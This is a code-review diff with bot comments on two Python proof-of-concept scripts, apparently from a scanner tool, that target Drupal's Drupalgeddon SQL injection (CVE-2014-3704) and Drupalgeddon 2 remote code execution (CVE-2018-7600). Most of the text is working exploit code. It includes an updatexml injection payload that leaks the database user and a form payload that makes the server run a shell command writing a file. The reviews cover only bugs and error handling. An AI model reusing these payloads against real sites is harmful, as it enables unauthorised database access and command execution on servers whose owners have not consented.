fix
@@ -1,8 +1,6 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
|
||||
from bs4 import BeautifulSoup
|
||||
import requests
|
||||
import re
|
||||
|
||||
'''
|
||||
Usage:
|
||||
@@ -10,27 +8,28 @@ Usage:
|
||||
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
|
||||
'''
|
||||
|
||||
|
||||
def attack(URL):
|
||||
url = URL+'/?q=node&destination=node'
|
||||
print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
||||
|
||||
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
|
||||
Content_Type="application/x-www-form-urlencoded"
|
||||
headers={"User-Agent":user_agent,"Content-Type":Content_Type}
|
||||
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
|
||||
Content_Type = "application/x-www-form-urlencoded"
|
||||
headers = {"User-Agent":user_agent,"Content-Type":Content_Type}
|
||||
|
||||
data ='pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
|
||||
data = 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
|
||||
try:
|
||||
r = requests.post(url,data=data, headers=headers, verify=False)
|
||||
soup=BeautifulSoup(r.content,"lxml")
|
||||
soup = BeautifulSoup(r.content,"lxml")
|
||||
print('请查看以下内容中是否有 用户名+@+IP 的注入结果:')
|
||||
print('--------------------')
|
||||
print(str(soup.find_all('li')[2])[100:135])#截取注入结果的那一段字符出来
|
||||
print('--------------------')
|
||||
except:
|
||||
except Exception:
|
||||
print('someerror!')
|
||||
print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
||||
print('\n')
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
attack()
|
||||
|
||||
|
||||
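Review bot: The `__main__` guard still calls `attack()` with no argument although the function is declared `attack(URL)`, so running this file directly raises a TypeError before any check runs; the same call closes the CVE-2018-7600 file. Pass the target explicitly, for example `attack(sys.argv[1])` with `import sys` at the top, or drop the guard if the module is only ever loaded through `moon.py`. Separately, the narrowed `except Exception:` still prints only `someerror!`, so a connection failure and an `IndexError` from `soup.find_all('li')[2]` on a page with fewer list items look identical; `except Exception as e: print('someerror!', e)` would let the operator tell them apart. The `requests.post(...)` call also has no `timeout=`, so one unresponsive host can stall a whole scan.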
@@ -7,9 +7,11 @@ Usage:
|
||||
moon.py -u drupal http://127.0.0.1:8080
|
||||
Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)
|
||||
'''
|
||||
|
||||
|
||||
def attack(URL):
|
||||
print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
||||
url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
|
||||
url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
|
||||
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "^w^" | tee hello.txt'}
|
||||
# print(url)
|
||||
try:
|
||||
@@ -18,11 +20,11 @@ def attack(URL):
|
||||
if check.status_code != 200:
|
||||
sys.exit("Not exploitable")
|
||||
print('error!')
|
||||
print ('可能存在漏洞-Check: '+ URL +'/hello.txt ^w^')
|
||||
print('可能存在漏洞-Check: ' + URL + '/hello.txt ^w^')
|
||||
except:
|
||||
print('someerroe!')
|
||||
print('[+]检测结束-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
||||
print('\n')
|
||||
|
||||
if __name__ == "__main__":
|
||||
attack()
|
||||
attack()
|
||||
|
||||
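Review bot: The handler here is still a bare `except:`, while the CVE-2014-3704 file in this same commit was narrowed to `except Exception:`; a bare clause also catches `KeyboardInterrupt` and `SystemExit`, so an interrupted run is reported as `someerroe!` (likely a typo for `someerror!`). If `print('error!')` is the replacement for `sys.exit("Not exploitable")` in the `check.status_code != 200` branch (the rendering has lost the +/- markers, so this is inferred), execution appears to continue into the `可能存在漏洞` message and report a host as possibly vulnerable right after the check failed; a `return` after `print('error!')` would avoid that false positive. The hunk starts inside the `try:` body, so the request that assigns `check` is not visible here.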